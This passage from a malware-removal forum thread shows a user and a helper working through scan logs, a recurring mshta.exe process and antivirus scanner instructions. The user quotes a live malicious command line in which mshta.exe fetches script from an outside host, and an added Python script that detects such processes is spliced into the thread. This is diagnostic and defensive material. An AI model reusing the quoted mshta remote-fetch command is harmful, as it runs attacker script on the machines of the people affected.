    2010-12-04 06:26:42 -------- d-----w- c:\docume~1\alluse~1\applic~1\MFAData
    2010-12-04 06:18:56 -------- d-----w- c:\docume~1\alluse~1\applic~1\PC Tools
    2010-12-04 05:31:42 -------- d-----w- C:\Riot Games
    2010-12-04 05:31:29 -------- d-----w- c:\program files\Riot Games
    2010-12-04 05:04:25 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\PMB Files
    2010-12-04 05:04:18 -------- d-----w- c:\docume~1\alluse~1\applic~1\PMB Files
    2010-12-04 05:03:17 -------- d-----w- c:\program files\Pando Networks
    2010-12-04 04:11:53 -------- d-----w- c:\program files\IObit
    2010-12-04 03:58:20 26600 ----a-w- c:\windows\system32\drivers\GEARAspiWDM.sys
    2010-12-04 03:58:20 107368 ----a-w- c:\windows\system32\GEARAspi.dll
    2010-12-04 03:57:23 -------- d-----w- c:\program files\iPod
    2010-12-04 03:57:18 -------- d-----w- c:\program files\iTunes
    2010-12-04 03:56:45 -------- d-----w- c:\program files\Bonjour
    2010-12-04 03:36:16 16400 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
    2010-12-04 03:35:16 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\Logishrd
    2010-12-04 03:34:43 10448 ----a-w- c:\windows\system32\drivers\LBeepKE.sys
    2010-12-04 03:30:55 -------- d-----w- c:\docume~1\marshall\applic~1\Logishrd
    2010-12-04 03:04:18 -------- d-----w- C:\f187b0792ef2605282a8
    2010-12-04 02:58:54 -------- d-----w- C:\MISC Stuff
    2010-12-01 03:38:00 9216 -c--a-w- c:\windows\system32\dllcache\wamps51.dll
    2010-12-01 03:38:00 76800 -c--a-w- c:\windows\system32\dllcache\wam51.dll
    2010-12-01 03:38:00 53248 -c--a-w- c:\windows\system32\dllcache\wamreg51.dll
    2010-12-01 03:38:00 41600 -c--a-w- c:\windows\system32\dllcache\weitekp9.dll
    2010-12-01 03:38:00 31232 -c--a-w- c:\windows\system32\dllcache\weitekp9.sys
    2010-12-01 03:36:59 400384 -c--a-w- c:\windows\system32\dllcache\fxsxp32.dll
    2010-12-01 03:34:38 16384 -c--a-w- c:\windows\system32\dllcache\isignup.exe
    2010-12-01 03:34:38 16384 ----a-w- c:\program files\internet explorer\connection wizard\isignup.exe
    2010-12-01 03:32:55 44544 -c--a-w- c:\windows\system32\dllcache\tscupgrd.exe
    2010-12-01 03:32:55 44544 ----a-w- c:\windows\system32\tscupgrd.exe
    2010-12-01 02:46:57 13312 -c--a-w- c:\windows\system32\dllcache\irclass.dll
    2010-12-01 02:46:57 13312 ----a-w- c:\windows\system32\irclass.dll
    2010-12-01 02:46:56 24661 -c--a-w- c:\windows\system32\dllcache\spxcoins.dll
    2010-12-01 02:46:56 24661 ----a-w- c:\windows\system32\spxcoins.dll
    2010-12-01 02:46:40 13753 ----a-r- c:\windows\SETE2.tmp
    2010-12-01 02:46:36 1086058 ----a-r- c:\windows\SETD6.tmp
    2010-12-01 02:46:35 1042903 ----a-r- c:\windows\SETD5.tmp
    2010-11-27 02:10:57 -------- d-----w- c:\docume~1\marshall\applic~1\TuneUp Software
    2010-11-27 02:09:52 -------- d-----w- c:\docume~1\alluse~1\applic~1\TuneUp Software
    2010-11-27 02:07:11 -------- d-sh--w- c:\docume~1\alluse~1\applic~1\{24036256-BFDB-4CD3-BE8A-A3D6160F2E16}
    2010-11-14 03:38:22 -------- dc-h--w- c:\docume~1\alluse~1\applic~1\{0151C9FC-719D-4459-B1E2-4685CC6E62A8}
    2010-11-12 07:15:11 -------- dc-h--w- c:\docume~1\marshall\locals~1\applic~1\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}
    2010-11-12 06:29:50 1480 ----a-w- c:\windows\system32\ealregsnapshot1.reg
    2010-11-12 06:29:43 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\Downloaded Installations
    2010-11-12 06:20:19 22328 ----a-w- c:\windows\system32\drivers\PnkBstrK.sys
    2010-11-12 06:20:19 22328 ----a-w- c:\docume~1\marshall\applic~1\PnkBstrK.sys
    2010-11-12 06:20:02 103736 ----a-w- c:\windows\system32\PnkBstrB.exe
    2010-11-12 06:20:01 669184 ----a-w- c:\windows\system32\pbsvc.exe
    2010-11-12 06:20:01 66872 ----a-w- c:\windows\system32\PnkBstrA.exe
    2010-11-09 05:03:28 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\Threat Expert
    2010-11-09 05:00:20 -------- d-----r- c:\program files\Skype
    2010-11-06 00:37:34 103864 ----a-w- c:\program files\mozilla firefox\plugins\nppdf32.dll
    2010-11-06 00:37:34 103864 ----a-w- c:\program files\internet explorer\plugins\nppdf32.dll

    ==================== Find3M ====================

    2010-12-04 04:37:06 240592 ----a-w- c:\windows\system32\nvdrsdb1.bin
    2010-12-04 04:37:06 1 ----a-w- c:\windows\system32\nvdrssel.bin
    2010-12-04 04:37:02 240592 ----a-w- c:\windows\system32\nvdrsdb0.bin
    2010-11-16 09:34:42 19722344 ----a-w- c:\windows\RTHDCPL.EXE
    2010-11-11 02:27:00 55912 ----a-w- c:\windows\system32\RtkCoInstXP.dll
    2010-11-03 07:15:50 84584 ----a-w- c:\windows\SOUNDMAN.EXE
    2010-11-03 07:15:50 359016 ----a-w- c:\windows\vncutil.exe
    2010-11-03 07:15:50 1833576 ----a-w- c:\windows\SkyTel.exe
    2010-11-03 07:15:38 891496 ----a-w- c:\windows\system32\RTSndMgr.CPL
    2010-11-03 07:15:26 9721960 ----a-w- c:\windows\RTLCPL.EXE
    2010-11-03 07:15:26 1489512 ----a-w- c:\windows\RtlUpd.exe
    2010-11-03 07:14:40 129640 ----a-w- c:\windows\RtkAudioService.exe
    2010-11-03 07:14:04 2180712 ----a-w- c:\windows\MicCal.exe
    2010-11-03 07:13:54 285288 ----a-w- c:\windows\system32\ALSNDMGR.CPL
    2010-11-03 07:13:54 2815592 ----a-w- c:\windows\ALCWZRD.EXE
    2010-11-03 07:13:42 64104 ----a-w- c:\windows\ALCMTR.EXE
    2010-10-27 23:46:10 1251944 ----a-w- c:\windows\RtlExUpd.dll
    2010-10-21 12:00:20 348160 ----a-w- c:\windows\system32\msvcr71.dll
    2010-10-21 12:00:19 499712 ----a-w- c:\windows\system32\msvcp71.dll
    2010-10-16 18:55:00 888424 ----a-w- c:\windows\system32\nvdispco32.dll
    2010-10-16 18:55:00 6359552 ----a-w- c:\windows\system32\nv4_disp.dll
    2010-10-16 18:55:00 61440 ----a-w- c:\windows\system32\OpenCL.dll
    2010-10-16 18:55:00 4882432 ----a-w- c:\windows\system32\nvcuda.dll
    2010-10-16 18:55:00 2932840 ----a-w- c:\windows\system32\nvcuvid.dll
    2010-10-16 18:55:00 2666600 ----a-w- c:\windows\system32\nvcuvenc.dll
    2010-10-16 18:55:00 2293194 ----a-w- c:\windows\system32\nvdata.bin
    2010-10-16 18:55:00 1462272 ----a-w- c:\windows\system32\nvapi.dll
    2010-10-16 18:55:00 14532608 ----a-w- c:\windows\system32\nvoglnt.dll
    2010-10-16 18:55:00 13012992 ----a-w- c:\windows\system32\nvcompiler.dll
    2010-10-16 01:04:22 81920 ----a-w- c:\windows\system32\nvwddi.dll
    2010-10-16 01:04:16 277608 ----a-w- c:\windows\system32\nvmccs.dll
    2010-10-16 01:04:16 13851752 ----a-w- c:\windows\system32\nvcpl.dll
    2010-10-16 01:04:16 110696 ----a-w- c:\windows\system32\nvmctray.dll
    2010-10-16 01:04:14 156776 ----a-w- c:\windows\system32\nvsvc32.exe
    2010-10-16 01:04:14 145000 ----a-w- c:\windows\system32\nvcolor.exe
    2010-10-07 01:23:02 91424 ----a-w- c:\windows\system32\dnssd.dll
    2010-10-07 01:23:02 197920 ----a-w- c:\windows\system32\dnssdX.dll
    2010-10-07 01:23:02 107808 ----a-w- c:\windows\system32\dns-sd.exe
    2010-09-30 06:34:03 21840 ----atw- c:\windows\system32\SIntfNT.dll
    2010-09-30 06:34:03 17212 ----atw- c:\windows\system32\SIntf32.dll
    2010-09-30 06:34:03 12067 ----atw- c:\windows\system32\SIntf16.dll
    2010-09-28 04:44:52 4184352 ----a-w- c:\windows\system32\usbaaplrc.dll
    2010-09-08 01:17:46 94208 ----a-w- c:\windows\system32\QuickTimeVR.qtx
    2010-09-08 01:17:46 69632 ----a-w- c:\windows\system32\QuickTime.qts
    2010-09-07 20:09:01 26216 ----a-w- c:\windows\system32\nvhdap32.dll
    2010-09-07 20:08:53 813672 ----a-w- c:\windows\system32\nvgenco32.dll
    2008-03-08 21:25:10 236 ---ha-w- c:\program files\common files\dx.reg

    ============= FINISH: 21:47:28.87 ===============


    Thanks so much for replying and waiting for me! :D
     
  7. 2010/12/05
    Cosmic Jester

    I think the repair shop just reinstalled Windows with SP2 and not 3, because I've JUST noticed that I have not installed Windows XP SP3. I won't install it yet until given the green light.

    But as long as you now know that you're dealing with a Windows XP 32-bit SP2 Operating System, I thought that would be helpful.
    I also found that the mshta.exe (The Funny Squirrel one) is duplicating itself every hour (approximately).

    EDIT: My post with all my logs has been sent, but it needs to be reviewed by a moderator. Sorry it took so long, GMER took around 5-6 hours to complete the scan.
     
    Last edited: 2010/12/05
  8. 2010/12/05
    crunchie

    That mshta.exe file is legit in the location shown in the log.

    I cannot see anything bad in those logs.

    Please Run the ESET Online Scanner and post the ScanLog with your post for assistance.
    • You will need to use Internet Explorer to complete this scan.
    • You will need to temporarily Disable your current Anti-virus program.
    • Be sure the option to Remove found threats is Un-checked at this time (we may have it clean what it finds at a later time), and the option to Scan unwanted applications is Checked.
    • When you have completed that scan, a scanlog ought to have been created and located at C:\Program Files\EsetOnlineScanner\log.txt. Please post that log for us as directed below.

    NOTE: If you are unable to complete the ESET scan, please try another from the list below:

     
  9. 2010/12/05
    Cosmic Jester

    Internet Explorer just crashes upon opening it.
    Do any of the other scanners work on Mozilla Firefox?

    Here is some extra info taken from the mshta.exe Properties (Thanks to Process Explorer) to better explain that this mshta.exe is different from the legit mshta.exe.

    Suspected mshta.exe:

    Path: C:\WINDOWS\System32\mshta.exe
    Command Line: mshta.exe http://funnysquirrelshow.com/gnjswp.php?jgnapf=89248952860608
    Current Directory: C:\WINDOWS\system32\

    But like I have asked, will any of the other scanners work with Mozilla Firefox? I haven't updated Internet Explorer since I haven't got SP3 installed due to having a semi-fresh install of Windows XP (Reinstalled OS, but most files from my prior to the reinstall were transferred).
    Sorry for making such a fuss! D:

    EDIT: It's getting late, so I will head off to bed, but I will leave my PC on during the night and disconnect the internet as good measure, of course, my next reply will be a long wait.
     
    Last edited: 2010/12/05
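The post above separates two things: the image path, which is the normal system location, and the command line, which hands mshta.exe a remote URL. The following is an added example, not part of the original thread, that applies that distinction to a process snapshot; the PIDs, the rows other than the quoted command line, and the simple tokenizer (first token is the program name, quotes delimit arguments) are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed process snapshot. The PIDs and the last three rows are made up;
# the path and command line in the first two rows are the ones quoted in the post.
SNAPSHOT = [
    {"pid": 1204, "path": r"C:\WINDOWS\System32\mshta.exe",
     "cmdline": "mshta.exe http://funnysquirrelshow.com/gnjswp.php?jgnapf=89248952860608"},
    {"pid": 2312, "path": r"C:\WINDOWS\System32\mshta.exe",
     "cmdline": "mshta.exe http://funnysquirrelshow.com/gnjswp.php?jgnapf=89248952860608"},
    {"pid": 3020, "path": r"C:\WINDOWS\system32\mshta.exe",
     "cmdline": r'"C:\WINDOWS\system32\mshta.exe" "C:\Program Files\Example\setup.hta"'},
    {"pid": 3388, "path": r"C:\Documents and Settings\user\Local Settings\Temp\mshta.exe",
     "cmdline": "mshta.exe"},
    {"pid": 640, "path": r"C:\WINDOWS\explorer.exe", "cmdline": "explorer.exe"},
]

TOKEN = re.compile(r'"[^"]*"|\S+')                  # quoted argument or bare word
REMOTE = re.compile(r"^(https?|ftp)://", re.I)       # content fetched over the network
INLINE = re.compile(r"^(javascript|vbscript):", re.I)  # script passed on the command line
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def classify(proc):
    """Return None if the process is not mshta.exe, else a list of findings.

    An empty list means mshta.exe is running from the expected directory
    with only local arguments.
    """
    directory, _, name = proc["path"].rpartition("\\")
    if name.lower() != "mshta.exe":
        return None
    findings = []
    # A copy of the binary outside the system directory is a separate problem
    # from a genuine binary being handed a hostile argument.
    if directory.lower() not in EXPECTED_DIRS:
        findings.append("unexpected-path")
    # Skip the first token (the program itself) and inspect the arguments.
    args = [t.strip('"') for t in TOKEN.findall(proc["cmdline"])][1:]
    for arg in args:
        if REMOTE.match(arg):
            findings.append("remote-url:" + (urlsplit(arg).hostname or "?"))
        elif INLINE.match(arg):
            findings.append("inline-script")
    return findings


def triage(snapshot):
    """Return (flagged, hosts): flagged is [(pid, findings)], hosts counts
    how many mshta.exe instances point at each remote host."""
    flagged, hosts = [], Counter()
    for proc in snapshot:
        findings = classify(proc)
        if not findings:
            continue
        flagged.append((proc["pid"], findings))
        for finding in findings:
            if finding.startswith("remote-url:"):
                hosts[finding.split(":", 1)[1]] += 1
    return flagged, hosts


if __name__ == "__main__":
    flagged, hosts = triage(SNAPSHOT)
    for pid, findings in flagged:
        print(pid, ", ".join(findings))
    for host, count in hosts.items():
        print(f"{count} mshta.exe instance(s) loading content from {host}")
```

A file-level check of mshta.exe passes for the first two rows, which is why the command line has to be inspected as well.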
  10. 2010/12/05
    crunchie

    You should be able to use FF with the following;

    Go to Kaspersky website and perform an online antivirus scan.

    1. Disable your active antivirus program.
    2. Read through the requirements and privacy statement and click on the Accept button.
    3. It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
    4. When the downloads have finished, click on Settings.
    5. Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button:

    • Spyware, Adware, Dialers, and other potentially dangerous programs
    • Archives
    • Mail databases
    6. Click on My Computer under Scan.
    7. Once the scan is complete, it will display the results. Click on View Scan Report.
    8. You will see a list of infected items there. Click on Save Report As....
    9. Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button. Then post it here.

    ==================

    Download OTL to your Desktop.

    • Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
    • Under the Custom Scan box paste this in:


    netsvcs
    %SYSTEMDRIVE%\*.exe
    /md5start
    eventlog.dll
    scecli.dll
    netlogon.dll
    cngaudit.dll
    sceclt.dll
    ntelogon.dll
    logevent.dll
    iaStor.sys
    nvstor.sys
    atapi.sys
    IdeChnDr.sys
    viasraid.sys
    AGP440.sys
    vaxscsi.sys
    nvatabus.sys
    viamraid.sys
    nvata.sys
    nvgts.sys
    iastorv.sys
    ViPrt.sys
    eNetHook.dll
    ahcix86.sys
    KR10N.sys
    nvstor32.sys
    /md5stop
    %systemroot%\*. /mp /s
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\System32\config\*.sav
    CREATERESTOREPOINT


    • Click the Quick Scan button. Do not change any settings unless otherwise told to do so. The scan won't take long.
    • When the scan completes, it will open two notepad windows: OTL.txt and Extras.txt. These are saved in the same location as OTL.
    • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them back here.
     
  11. 2010/12/05
    crunchie

    I see you have P2P software (Azureus, Limewire, BitTorrent, uTorrent etc…) installed on your machine. We are not here to pass judgment on file-sharing as a concept. However, we will warn you that engaging in this activity and having this kind of software installed on your machine will always make you more susceptible to re-infections. It may be contributing to your current situation. This page will give you further information.

    Please note: Even if you are using a "safe" P2P program, it is only the program that is safe. You will be sharing files from uncertified sources, and these are often infected. The bad guys use P2P filesharing as a major conduit to spread their wares and their infections.

    References for the risk of these programs are here, and here.

    I would strongly recommend that you uninstall them, and read the links above for educational value!

    Note: Please be advised that continued use of these programs after being warned of the danger of infections from them, may result in the discontinued help of future cleaning of your system here at WindowsBBS Malware and Virus removal.
     
  12. 2010/12/05
    Cosmic Jester

    I'm back
    Yeah, I am well aware of the threats of P2P programs, which I may just leave that stuff alone for the time being. Thanks though.
    However, thing is, I used to have 2 hard drives, but my second one failed (hence why it had to go to the repair shop, so for now I just have one hard drive), and all my torrent clients were on that, so there may just be old registries which can't seem to go away. (If you're willing to help me get rid of those afterward, that would be great).

    Kaspersky doesn't appear to work due to a license expiry, will it be okay to use one of the other suggested online scanners?
    I have also not started to use OTL yet until I have done the online scan like you said.
     
  13. 2010/12/05
    crunchie

    Try one of these instead;

    Please Run the ESET Online Scanner and post the ScanLog with your post for assistance.
    • You will need to use Internet Explorer to complete this scan.
    • You will need to temporarily Disable your current Anti-virus program.
    • Be sure the option to Remove found threats is Un-checked at this time (we may have it clean what it finds at a later time), and the option to Scan unwanted applications is Checked.
    • When you have completed that scan, a scanlog ought to have been created and located at C:\Program Files\EsetOnlineScanner\log.txt. Please post that log for us as directed below.

    NOTE: If you are unable to complete the ESET scan, please try another from the list below:

     
  14. 2010/12/05
    Cosmic Jester

    I have the following options for ESET Online Scanner:

    [ ] Remove Found Threats
    [ ] Scan Archives

    ADVANCED:
    [x] Scan for Potentially Unwanted Applications
    [ ] Scan for Potentially Unsafe Applications
    [x] Enable Anti-Stealth Technology
    Scan Targets: Operating Memory and Local Drives
    [ ] Use custom proxy settings

    Before I press start, would you like me to check any other boxes? (I just really want this done right, you know? :p)
    After your reply, I will post the logs from ESET and OTL.
    Thanks for putting up with me so far! :D
     
  15. 2010/12/05
    crunchie

    Just as you have it there :)
     
  16. 2010/12/05
    Cosmic Jester

    Here you go, the logs are in this order (Post is past its maximum character limit, so each one will be in its own post):
    - ESET
    - OTL
    - Extras

    ESETSmartInstaller@High as downloader log:
    all ok
    # version=7
    # OnlineScannerApp.exe=1.0.0.1
    # OnlineScanner.ocx=1.0.0.6211
    # api_version=3.0.2
    # EOSSerial=2bc5ca2fa2e32744b3cf566b4b8d1825
    # end=finished
    # remove_checked=false
    # archives_checked=false
    # unwanted_checked=true
    # unsafe_checked=false
    # antistealth_checked=true
    # utc_time=2010-12-06 01:38:11
    # local_time=2010-12-06 12:38:11 (+1000, AUS Eastern Standard Time)
    # country= "Australia "
    # lang=1033
    # osver=5.1.2600 NT Service Pack 2
    # compatibility_mode=512 16777215 100 0 0 0 0 0
    # compatibility_mode=8192 67108863 100 0 5389 5389 0 0
    # scanned=233207
    # found=190
    # cleaned=0
    # scan_time=4997
    C:\Documents and Settings\Marshall\My Documents\My Music\Da Lench Mob - Gorillas in the Mist.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\01 Curtains Up (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\02 White America.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\03 Business.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\04 Cleanin Out My Closet.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\05 Square Dance.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\06 The Kiss (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\07 Soldier.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\08 Say Goodbye Hollywood.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\09 Drips.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\10 Without Me.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\11 Paul Rosenberg (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\12 Sing for the Moment.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\13 Superman.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\14 Hailie's Song.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\15 Steve Berman (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\16 When the Music Stops.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\17 Say What You Say.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\18 'Till I Collapse.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\19 My Dad's Gone Crazy.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\20 Curtains Close (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\01 Public Service Announcement 2000.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\02 Kill You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\03 Stan.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\04 Paul (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\05 Who Knew.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\06 Steve Berman.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\07 The Way I Am.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\08 The Real Slim Shady.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\09 Remember Me-.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\10 I'm Back.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\11 Marshall Mathers.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\12 Ken Kaniff (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\13 Drug Ballad.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\14 Amityville.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\15 Bitch Please II.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\16 Kim.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\17 Under the Influence.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\18 Criminal.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\01 Public Service Announcement.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\02 My Name Is.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\03 Guilty Conscience.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\04 Brain Damage.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\05 Paul.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\06 If I Had.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\07 97' Bonnie & Clyde.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\08 Bitch.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\09 Role Model.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\10 Lounge.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\11 My Fault.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\12 Ken Kaniff.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\13 Cum on Everybody.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\14 Rock Bottom.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\15 Just Don't Give a ****.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\16 Soap.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\17 As the World Turns.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
